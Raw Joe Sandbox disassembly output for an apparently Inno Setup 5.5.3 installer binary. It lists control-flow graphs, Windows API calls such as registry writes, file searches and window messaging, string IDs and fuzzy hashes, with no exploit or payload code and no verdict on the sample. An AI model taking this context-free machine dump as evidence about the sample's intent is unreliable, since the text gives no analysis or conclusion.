2528->2532 2529->2528 2531->2532 2535 4683f3-468439 call 4181e0 GetSystemMenu AppendMenuA call 403738 AppendMenuA call 468d88 2532->2535 2536 4683d1-4683ee call 44ffdc call 450138 2532->2536 2549 468453 2535->2549 2550 46843b-468442 2535->2550 2536->2535 2553 468455-468464 2549->2553 2551 468444-46844d 2550->2551 2552 46844f-468451 2550->2552 2551->2549 2551->2552 2552->2553 2554 468466-46846d 2553->2554 2555 46847e 2553->2555 2557 46846f-468478 2554->2557 2558 46847a-46847c 2554->2558 2556 468480-46849a 2555->2556 2559 468543-46854a 2556->2559 2560 4684a0-4684a9 2556->2560 2557->2555 2557->2558 2558->2556 2563 468550-468573 call 47c26c call 403450 2559->2563 2564 4685dd-4685eb call 414b18 2559->2564 2561 468504-46853e call 414b18 * 3 2560->2561 2562 4684ab-468502 call 47c26c call 414b18 call 47c26c call 414b18 call 47c26c call 414b18 2560->2562 2561->2559 2562->2559 2587 468584-468598 call 403494 2563->2587 2588 468575-468582 call 47c440 2563->2588 2572 4685f0-4685f9 2564->2572 2576 4685ff-468617 call 429fd8 2572->2576 2577 468709-468738 call 42b96c call 44e83c 2572->2577 2589 46868e-468692 2576->2589 2590 468619-46861d 2576->2590 2606 4687e6-4687ea 2577->2606 2607 46873e-468742 2577->2607 2602 4685aa-4685db call 42c804 call 42cbc0 call 403494 call 414b18 2587->2602 2603 46859a-4685a5 call 403494 2587->2603 2588->2602 2596 468694-46869d 2589->2596 2597 4686e2-4686e6 2589->2597 2598 46861f-468659 call 40b24c call 47c26c 2590->2598 2596->2597 2604 46869f-4686aa 2596->2604 2609 4686fa-468704 call 42a05c 2597->2609 2610 4686e8-4686f8 call 42a05c 2597->2610 2663 46865b-468662 2598->2663 2664 468688-46868c 2598->2664 2602->2572 2603->2602 2604->2597 2614 4686ac-4686b0 2604->2614 2617 4687ec-4687f3 2606->2617 2618 468869-46886d 2606->2618 2616 468744-468756 call 40b24c 2607->2616 2609->2577 2610->2577 2622 4686b2-4686d5 call 40b24c call 406ac4 2614->2622 2641 468788-4687bf call 47c26c call 44cb0c 2616->2641 2642 468758-468786 call 47c26c call 44cbdc 2616->2642 2617->2618 2625 4687f5-4687fc 2617->2625 2626 4688d6-4688df 2618->2626 2627 46886f-468886 call 40b24c 2618->2627 2673 4686d7-4686da 2622->2673 2674 4686dc-4686e0 2622->2674 2625->2618 2636 4687fe-468809 2625->2636 2634 4688e1-4688f9 call 40b24c call 4699fc 2626->2634 2635 4688fe-468913 call 466ee0 call 466c5c 2626->2635 2656 4688c6-4688d4 call 4699fc 2627->2656 2657 468888-4688c4 call 40b24c call 4699fc * 2 call 46989c 2627->2657 2634->2635 2682 468965-46896f call 414a44 2635->2682 2683 468915-468938 call 42a040 call 40b24c 2635->2683 2636->2635 2644 46880f-468813 2636->2644 2684 4687c4-4687c8 2641->2684 2642->2684 2655 468815-46882b call 40b24c 2644->2655 2679 46885e-468862 2655->2679 2680 46882d-468859 call 42a05c call 4699fc call 46989c 2655->2680 2656->2635 2657->2635 2663->2664 2675 468664-468676 call 406ac4 2663->2675 2664->2589 2664->2598 2673->2597 2674->2597 2674->2622 2675->2664 2701 468678-468682 2675->2701 2679->2655 2694 468864 2679->2694 2680->2635 2696 468974-468993 call 414a44 2682->2696 2715 468943-468952 call 414a44 2683->2715 2716 46893a-468941 2683->2716 2692 4687d3-4687d5 2684->2692 2693 4687ca-4687d1 2684->2693 2700 4687dc-4687e0 2692->2700 2693->2692 2693->2700 2694->2635 2711 468995-4689b8 call 42a040 call 469b5c 2696->2711 2712 4689bd-4689e0 call 47c26c call 403450 2696->2712 2700->2606 2700->2616 2701->2664 2706 468684 2701->2706 2706->2664 2711->2712 2730 4689e2-4689eb 2712->2730 2731 4689fc-468a05 2712->2731 2715->2696 2716->2715 2720 468954-468963 call 414a44 2716->2720 2720->2696 2730->2731 2734 4689ed-4689fa call 47c440 2730->2734 2732 468a07-468a19 call 403684 2731->2732 2733 468a1b-468a2b call 403494 2731->2733 2732->2733 2742 468a2d-468a38 call 403494 2732->2742 2741 468a3d-468a54 call 414b18 2733->2741 2734->2741 2746 468a56-468a5d 2741->2746 2747 468a8a-468a94 call 414a44 2741->2747 2742->2741 2749 468a5f-468a68 2746->2749 2750 468a6a-468a74 call 42b0e4 2746->2750 2752 468a99-468abe call 403400 * 3 2747->2752 2749->2750 2753 468a79-468a88 call 414a44 2749->2753 2750->2753 2753->2752
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 004958CC: GetWindowRect.USER32(00000000), ref: 004958E2
                                                                                                                                        • LoadBitmapA.USER32(00400000,STOPIMAGE), ref: 00467773
                                                                                                                                          • Part of subcall function 0041D6B0: GetObjectA.GDI32(?,00000018,0046778D), ref: 0041D6DB
                                                                                                                                          • Part of subcall function 00467180: SHGetFileInfo.SHELL32(c:\directory,00000010,?,00000160,00001010), ref: 00467223
                                                                                                                                          • Part of subcall function 00467180: ExtractIconA.SHELL32(00400000,00000000,?), ref: 00467249
                                                                                                                                          • Part of subcall function 00467180: ExtractIconA.SHELL32(00400000,00000000,00000027), ref: 004672A0
                                                                                                                                          • Part of subcall function 00466B40: KiUserCallbackDispatcher.NTDLL(?,?,00000000,?,00467828,00000000,00000000,00000000,0000000C,00000000), ref: 00466B58
                                                                                                                                          • Part of subcall function 00495B50: MulDiv.KERNEL32(0000000D,?,0000000D), ref: 00495B5A
                                                                                                                                          • Part of subcall function 0042ED38: GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0042EDA8
                                                                                                                                          • Part of subcall function 0042ED38: SHAutoComplete.SHLWAPI(00000000,00000001), ref: 0042EDC5
                                                                                                                                          • Part of subcall function 0049581C: GetDC.USER32(00000000), ref: 0049583E
                                                                                                                                          • Part of subcall function 0049581C: SelectObject.GDI32(?,00000000), ref: 00495864
                                                                                                                                          • Part of subcall function 0049581C: ReleaseDC.USER32(00000000,?), ref: 004958B5
                                                                                                                                          • Part of subcall function 00495B40: MulDiv.KERNEL32(0000004B,?,00000006), ref: 00495B4A
                                                                                                                                        • GetSystemMenu.USER32(00000000,00000000,0000000C,00000000,00000000,00000000,00000000,021EFC20,021F1980,?,?,021F19B0,?,?,021F1A00,?), ref: 004683FD
                                                                                                                                        • AppendMenuA.USER32(00000000,00000800,00000000,00000000), ref: 0046840E
                                                                                                                                        • AppendMenuA.USER32(00000000,00000000,0000270F,00000000), ref: 00468426
                                                                                                                                          • Part of subcall function 0042A05C: SendMessageA.USER32(00000000,0000014E,00000000,00000000), ref: 0042A072
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Menu$AppendExtractIconObject$AddressAutoBitmapCallbackCompleteDispatcherFileInfoLoadMessageProcRectReleaseSelectSendSystemUserWindow
                                                                                                                                        • String ID: $(Default)$STOPIMAGE$%H
                                                                                                                                        • API String ID: 3231140908-2624782221
                                                                                                                                        • Opcode ID: cd61aa661d0cbe35304877807cea77ca0702e96d718fc27b010991c92e86a780
                                                                                                                                        • Instruction ID: 1a3196d4b4984e68f3522cc8585b165e0004af585c118fa25862355e2bbb38c0
                                                                                                                                        • Opcode Fuzzy Hash: cd61aa661d0cbe35304877807cea77ca0702e96d718fc27b010991c92e86a780
                                                                                                                                        • Instruction Fuzzy Hash: 95F2C6346005248FCB00EF69D9D9F9973F1BF49304F1582BAE5049B36ADB74AC46CB9A
                                                                                                                                        APIs
                                                                                                                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,004750F2,?,?,0049C1E0,00000000), ref: 00474FE1
                                                                                                                                        • FindNextFileA.KERNEL32(00000000,?,00000000,?,00000000,004750F2,?,?,0049C1E0,00000000), ref: 004750BE
                                                                                                                                        • FindClose.KERNEL32(00000000,00000000,?,00000000,?,00000000,004750F2,?,?,0049C1E0,00000000), ref: 004750CC
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Find$File$CloseFirstNext
                                                                                                                                        • String ID: unins$unins???.*
                                                                                                                                        • API String ID: 3541575487-1009660736
                                                                                                                                        • Opcode ID: 490a2bf6f62b777b12f8bb075fd261ec892e44da2a65e6c72c5e66397d3a6b60
                                                                                                                                        • Instruction ID: 191fa049ef1442540897bd6b232d6b1da598bf4afdbbee48782243349675ce5a
                                                                                                                                        • Opcode Fuzzy Hash: 490a2bf6f62b777b12f8bb075fd261ec892e44da2a65e6c72c5e66397d3a6b60
                                                                                                                                        • Instruction Fuzzy Hash: 95315074A00548ABCB10EB65CD81BDEB7A9DF45304F50C0B6E40CAB3A2DB789F418B59
                                                                                                                                        APIs
                                                                                                                                        • GetVersion.KERNEL32(?,0046E17A), ref: 0046E0EE
                                                                                                                                        • CoCreateInstance.OLE32(00499B98,00000000,00000001,00499BA8,?,?,0046E17A), ref: 0046E10A
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateInstanceVersion
                                                                                                                                        • String ID: HR~
                                                                                                                                        • API String ID: 1462612201-3203950215
                                                                                                                                        • Opcode ID: 323ef6e325584454da74969db5385277b15969f7569c16a340aaa36caeb4eadb
                                                                                                                                        • Instruction ID: e32462cabb755f907f5de1887460af807d545ab7c9798ff14e002636b2035e3f
                                                                                                                                        • Opcode Fuzzy Hash: 323ef6e325584454da74969db5385277b15969f7569c16a340aaa36caeb4eadb
                                                                                                                                        • Instruction Fuzzy Hash: 90F0A7352812009FEB10975ADC86B8937C47B22315F50007BE04497292D2BD94C0471F
                                                                                                                                        APIs
                                                                                                                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,00452AC3,?,?,-00000001,00000000), ref: 00452A9D
                                                                                                                                        • GetLastError.KERNEL32(00000000,?,00000000,00452AC3,?,?,-00000001,00000000), ref: 00452AA5
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorFileFindFirstLast
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 873889042-0
                                                                                                                                        • Opcode ID: 9c675a8f1f28b386d0fa8c71b8ecb41695e84785a8bb79b0d9bc0322d07a8b6a
                                                                                                                                        • Instruction ID: 3e58272229af866f17ac5928e9872a720c3be2d4903e778e839a846eb7d55d53
                                                                                                                                        • Opcode Fuzzy Hash: 9c675a8f1f28b386d0fa8c71b8ecb41695e84785a8bb79b0d9bc0322d07a8b6a
                                                                                                                                        • Instruction Fuzzy Hash: 94F0F971A04604AB8B10EF669D4149EF7ACEB8672571046BBFC14E3282DAB84E0485A8
                                                                                                                                        APIs
                                                                                                                                        • GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049B4C0,00000001,?,00408633,?,00000000,00408712), ref: 00408586
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InfoLocale
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2299586839-0
                                                                                                                                        • Opcode ID: 64da881718ef9bfb5c3691e8182369eeaf442f2681d4624e7b5adc518b999176
                                                                                                                                        • Instruction ID: 8daab3ef8e56b0da8b8c23f45c5b5388ad46b50bd825570c2d348c61856efc62
                                                                                                                                        • Opcode Fuzzy Hash: 64da881718ef9bfb5c3691e8182369eeaf442f2681d4624e7b5adc518b999176
                                                                                                                                        • Instruction Fuzzy Hash: BFE0223170021466C311AA2A9C86AEAB34C9758310F00427FB904E73C2EDB89E4042A8
                                                                                                                                        APIs
                                                                                                                                        • NtdllDefWindowProc_A.USER32(?,?,?,?,?,00424151,?,00000000,0042415C), ref: 00423BAE
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: NtdllProc_Window
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4255912815-0
                                                                                                                                        • Opcode ID: 03c86555d74cd6010afd77b9e61a524e96c156e733cd5bd8e2feacc4387cef90
                                                                                                                                        • Instruction ID: a748582893d7571d6ac8bdbe819d0a8fbf5f36db2d3505b6f19a51c7a0bbae16
                                                                                                                                        • Opcode Fuzzy Hash: 03c86555d74cd6010afd77b9e61a524e96c156e733cd5bd8e2feacc4387cef90
                                                                                                                                        • Instruction Fuzzy Hash: 47F0B979205608AF8B40DF99C588D4ABBE8AB4C260B058195B988CB321C234ED808F90
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: NameUser
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2645101109-0
                                                                                                                                        • Opcode ID: 969018677e36c7ee3cac7a31a88a81c68082f6a067fe28717e4d5eb0c099a74a
                                                                                                                                        • Instruction ID: 9f318ec9847dd9a6abcb639c8bc611599857aea0b867fcad4bfaeec6bdb042bf
                                                                                                                                        • Opcode Fuzzy Hash: 969018677e36c7ee3cac7a31a88a81c68082f6a067fe28717e4d5eb0c099a74a
                                                                                                                                        • Instruction Fuzzy Hash: 8FD0C27230470473CB00AA689C825AA35CD8B84305F00483E3CC5DA2C3FABDDA485756
                                                                                                                                        APIs
                                                                                                                                        • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 0042F53C
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: NtdllProc_Window
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4255912815-0
                                                                                                                                        • Opcode ID: 9e43cbcd657a147b44e82c26281af1c584f356d37a2e763e4ec43db1fd6d4cd6
                                                                                                                                        • Instruction ID: 7ca9c19e24a5def9c493c34941f9da96f9ca037215ec7a65a90973bf7a04e639
                                                                                                                                        • Opcode Fuzzy Hash: 9e43cbcd657a147b44e82c26281af1c584f356d37a2e763e4ec43db1fd6d4cd6
                                                                                                                                        • Instruction Fuzzy Hash: FCD09E7120011D7B9B00DE99E840D6B33AD9B88710B909925F945D7642D634ED9197A5

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 844 46f058-46f08a 845 46f0a7 844->845 846 46f08c-46f093 844->846 849 46f0ae-46f0e6 call 403634 call 403738 call 42dec0 845->849 847 46f095-46f09c 846->847 848 46f09e-46f0a5 846->848 847->845 847->848 848->849 856 46f101-46f12a call 403738 call 42dde4 849->856 857 46f0e8-46f0fc call 403738 call 42dec0 849->857 865 46f12c-46f135 call 46ed28 856->865 866 46f13a-46f163 call 46ee44 856->866 857->856 865->866 870 46f175-46f178 call 403400 866->870 871 46f165-46f173 call 403494 866->871 875 46f17d-46f1c8 call 46ee44 call 42c3fc call 46ee8c call 46ee44 870->875 871->875 884 46f1de-46f1ff call 45559c call 46ee44 875->884 885 46f1ca-46f1dd call 46eeb4 875->885 892 46f255-46f25c 884->892 893 46f201-46f254 call 46ee44 call 431404 call 46ee44 call 431404 call 46ee44 884->893 885->884 894 46f25e-46f29b call 431404 call 46ee44 call 431404 call 46ee44 892->894 895 46f29c-46f2a3 892->895 893->892 894->895 899 46f2e4-46f309 call 40b24c call 46ee44 895->899 900 46f2a5-46f2e3 call 46ee44 * 3 895->900 919 46f30b-46f316 call 47c26c 899->919 920 46f318-46f321 call 403494 899->920 900->899 929 46f326-46f331 call 478e04 919->929 920->929 934 46f333-46f338 929->934 935 46f33a 929->935 936 46f33f-46f509 call 403778 call 46ee44 call 47c26c call 46ee8c call 403494 call 40357c * 2 call 46ee44 call 403494 call 40357c * 2 call 46ee44 call 47c26c call 46ee8c call 47c26c call 46ee8c call 47c26c call 46ee8c call 47c26c call 46ee8c call 47c26c call 46ee8c call 47c26c call 46ee8c call 47c26c call 46ee8c call 47c26c call 46ee8c call 47c26c call 46ee8c call 47c26c 934->936 935->936 999 46f51f-46f52d call 46eeb4 936->999 1000 46f50b-46f51d call 46ee44 936->1000 1004 46f532 999->1004 1005 46f533-46f57c call 46eeb4 call 46eee8 call 46ee44 call 47c26c call 46ef4c 1000->1005 1004->1005 1016 46f5a2-46f5af 1005->1016 1017 46f57e-46f5a1 call 46eeb4 * 2 1005->1017 1019 46f5b5-46f5bc 1016->1019 1020 46f67e-46f685 1016->1020 1017->1016 1024 46f5be-46f5c5 1019->1024 1025 46f629-46f638 1019->1025 1021 46f687-46f6bd call 494cec 1020->1021 1022 46f6df-46f6f5 RegCloseKey 1020->1022 1021->1022 1024->1025 1029 46f5c7-46f5eb call 430bcc 1024->1029 1028 46f63b-46f648 1025->1028 1032 46f65f-46f678 call 430c08 call 46eeb4 1028->1032 1033 46f64a-46f657 1028->1033 1029->1028 1039 46f5ed-46f5ee 1029->1039 1042 46f67d 1032->1042 1033->1032 1035 46f659-46f65d 1033->1035 1035->1020 1035->1032 1041 46f5f0-46f616 call 40b24c call 479630 1039->1041 1047 46f623-46f625 1041->1047 1048 46f618-46f61e call 430bcc 1041->1048 1042->1020 1047->1041 1050 46f627 1047->1050 1048->1047 1050->1028
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0046EE44: RegSetValueExA.ADVAPI32(?,Inno Setup: Setup Version,00000000,00000001,00000000,00000001,0047620E,?,0049C1E0,?,0046F15B,?,00000000,0046F6F6,?,_is1), ref: 0046EE67
                                                                                                                                          • Part of subcall function 0046EEB4: RegSetValueExA.ADVAPI32(?,NoModify,00000000,00000004,00000000,00000004,00000001,?,0046F532,?,?,00000000,0046F6F6,?,_is1,?), ref: 0046EEC7
                                                                                                                                        • RegCloseKey.ADVAPI32(?,0046F6FD,?,_is1,?,Software\Microsoft\Windows\CurrentVersion\Uninstall\,00000000,0046F748,?,?,0049C1E0,00000000), ref: 0046F6F0
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Value$Close
                                                                                                                                        • String ID: " /SILENT$5.5.3 (a)$Comments$Contact$DisplayIcon$DisplayName$DisplayVersion$EstimatedSize$HelpLink$HelpTelephone$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: Language$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: Setup Version$Inno Setup: User$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$InstallDate$InstallLocation$MajorVersion$MinorVersion$ModifyPath$NoModify$NoRepair$Publisher$QuietUninstallString$Readme$RegisterPreviousData$Software\Microsoft\Windows\CurrentVersion\Uninstall\$URLInfoAbout$URLUpdateInfo$UninstallString$_is1
                                                                                                                                        • API String ID: 3391052094-3342197833
                                                                                                                                        • Opcode ID: 41e5a022c9dfc144d242315d0234d20c9f1df57cded100a3ade253d049a3cf6c
                                                                                                                                        • Instruction ID: 0d1426ff9ce9a688a4d167ea33859b9e50b28094dc6fe7db73e07d6bdcf854ec
                                                                                                                                        • Opcode Fuzzy Hash: 41e5a022c9dfc144d242315d0234d20c9f1df57cded100a3ade253d049a3cf6c
                                                                                                                                        • Instruction Fuzzy Hash: D1125935A001089BDB04EF95E881ADE73F5EB48304F24817BE8506B366EB79AD45CF5E

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 1051 492848-49287c call 403684 1054 49287e-49288d call 446f9c Sleep 1051->1054 1055 492892-49289f call 403684 1051->1055 1060 492d22-492d3c call 403420 1054->1060 1061 4928ce-4928db call 403684 1055->1061 1062 4928a1-4928c4 call 446ff8 call 403738 FindWindowA call 447278 1055->1062 1070 49290a-492917 call 403684 1061->1070 1071 4928dd-492905 call 446ff8 call 403738 FindWindowA call 447278 1061->1071 1080 4928c9 1062->1080 1078 492919-49295b call 446f9c * 4 SendMessageA call 447278 1070->1078 1079 492960-49296d call 403684 1070->1079 1071->1060 1078->1060 1090 4929bc-4929c9 call 403684 1079->1090 1091 49296f-4929b7 call 446f9c * 4 PostMessageA call 4470d0 1079->1091 1080->1060 1100 492a18-492a25 call 403684 1090->1100 1101 4929cb-492a13 call 446f9c * 4 SendNotifyMessageA call 4470d0 1090->1101 1091->1060 1113 492a52-492a5f call 403684 1100->1113 1114 492a27-492a4d call 446ff8 call 403738 RegisterClipboardFormatA call 447278 1100->1114 1101->1060 1125 492a61-492a9b call 446f9c * 3 SendMessageA call 447278 1113->1125 1126 492aa0-492aad call 403684 1113->1126 1114->1060 1125->1060 1138 492aaf-492aef call 446f9c * 3 PostMessageA call 4470d0 1126->1138 1139 492af4-492b01 call 403684 1126->1139 1138->1060 1152 492b48-492b55 call 403684 1139->1152 1153 492b03-492b43 call 446f9c * 3 SendNotifyMessageA call 4470d0 1139->1153 1164 492baa-492bb7 call 403684 1152->1164 1165 492b57-492b75 call 446ff8 call 42e394 1152->1165 1153->1060 1175 492bb9-492be5 call 446ff8 call 403738 call 446f9c GetProcAddress 1164->1175 1176 492c31-492c3e call 403684 1164->1176 1185 492b87-492b95 GetLastError call 447278 1165->1185 1186 492b77-492b85 call 447278 1165->1186 1206 492c21-492c2c call 4470d0 1175->1206 1207 492be7-492c1c call 446f9c * 2 call 447278 call 4470d0 1175->1207 1187 492c40-492c61 call 446f9c FreeLibrary call 4470d0 1176->1187 1188 492c66-492c73 call 403684 1176->1188 1194 492b9a-492ba5 call 447278 1185->1194 1186->1194 1187->1060 1203 492c98-492ca5 call 403684 1188->1203 1204 492c75-492c93 call 446ff8 call 403738 CreateMutexA 1188->1204 1194->1060 1215 492cdb-492ce8 call 403684 1203->1215 1216 492ca7-492cd9 call 48ccc8 call 403574 call 403738 OemToCharBuffA call 48cce0 1203->1216 1204->1060 1206->1060 1207->1060 1228 492cea-492d1c call 48ccc8 call 403574 call 403738 CharToOemBuffA call 48cce0 1215->1228 1229 492d1e 1215->1229 1216->1060 1228->1060 1229->1060
                                                                                                                                        APIs
                                                                                                                                        • Sleep.KERNEL32(00000000,00000000,00492D3D,?,?,?,?,00000000,00000000,00000000), ref: 00492888
                                                                                                                                        • FindWindowA.USER32(00000000,00000000), ref: 004928B9
                                                                                                                                        Strings
